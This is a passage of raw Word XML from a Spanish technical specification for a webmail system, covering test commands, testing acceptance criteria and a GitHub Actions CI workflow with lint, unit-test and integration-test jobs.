      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos de ejecución local:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tests unitarios con watch mode</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test:unit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tests unitarios con cobertura</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test:unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--coverage</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tests de integración</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test:integration</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tests E2E</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test:e2e</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Todos los tests (CI)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Criterios de aceptación del capítulo de testing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Suite unitaria completa con &gt;85% cobertura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Tests de integración para todos los endpoints de la API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Tests E2E para flujos críticos (login, compose, envío, lectura)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Suite de regresión XSS con 10+ payloads conocidos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Reporte de cobertura automático en cada PR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="215"/>
    <w:bookmarkEnd w:id="216"/>
    <w:bookmarkEnd w:id="217"/>
    <w:bookmarkStart w:id="234" w:name="cicd-y-devops"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13. CI/CD y DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La infraestructura de integración continua y despliegue continuo de Webmail 6.0 está diseñada para operar directamente sobre Docker Compose, que — con health checks, restart policies y resource limits apropiados — es una solución productiva para despliegues self-hosted de pequeña y mediana escala</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[192]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Kubernetes se contempla como migración futura para escenarios enterprise.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="221" w:name="github-actions-pipeline"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.1 GitHub Actions Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GitHub Actions es la plataforma de CI/CD por defecto para proyectos alojados en GitHub en 2026, ofreciendo configuración zero-config con workflows YAML en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[140]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[152]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El pipeline se divide en tres workflows independientes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="218" w:name="Xb87da4391ff6c6e0614717e2c4853ce4ca5afd6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.1.1 CI: Install → Lint → Unit → Integration → Build → Coverage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># .github/workflows/ci.yml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> CI</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'packages/**'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'.github/workflows/**'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'docker-compose*.yml'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'package.json'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pnpm-workspace.yaml'</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'packages/**'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'.github/workflows/**'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'package.json'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pnpm-workspace.yaml'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">concurrency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ github.workflow }}-${{ github.ref }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cancel-in-progress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">true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changes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ubuntu-24.04</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outputs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ steps.filter.outputs.api }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ steps.filter.outputs.web }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">shared</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ steps.filter.outputs.shared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dorny/paths-filter@v3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            api: ['packages/api/**', 'packages/shared/**']</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            web: ['packages/web/**', 'packages/shared/**']</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            shared: ['packages/shared/**']</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lint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ubuntu-24.04</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needs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ needs.changes.outputs.api == 'true' || needs.changes.outputs.web == 'true'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pnpm/action-setup@v4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9.15.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run_install</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'22'</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'pnpm'</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pnpm install --frozen-lockfile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pnpm lint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pnpm typecheck</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">unit-test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ubuntu-24.04</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changes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ needs.changes.outputs.api == 'true' || needs.changes.outputs.web == 'true' || needs.changes.outputs.shared == 'true' }}</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fail-fast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package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> shared</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pnpm/action-setup@v4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9.15.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run_install</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'22'</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'pnpm'</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pnpm install --frozen-lockfile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unit tests with coverage</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          cd packages/${{ matrix.package }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          pnpm vitest run --coverage --reporter=json --reporter=text --outputFile=coverage-report.json</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coverage artifact</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coverage-${{ matrix.package }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/${{ matrix.package }}/coverage/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retention-days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">integration-test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ubuntu-24.04</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changes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ needs.changes.outputs.api == 'true' || needs.changes.outputs.shared == 'true' }}</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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mongo</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mongo:7.0.16</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'27017:27017'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserv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MONGO_INITDB_ROOT_USERNAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MONGO_INITDB_ROOT_PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
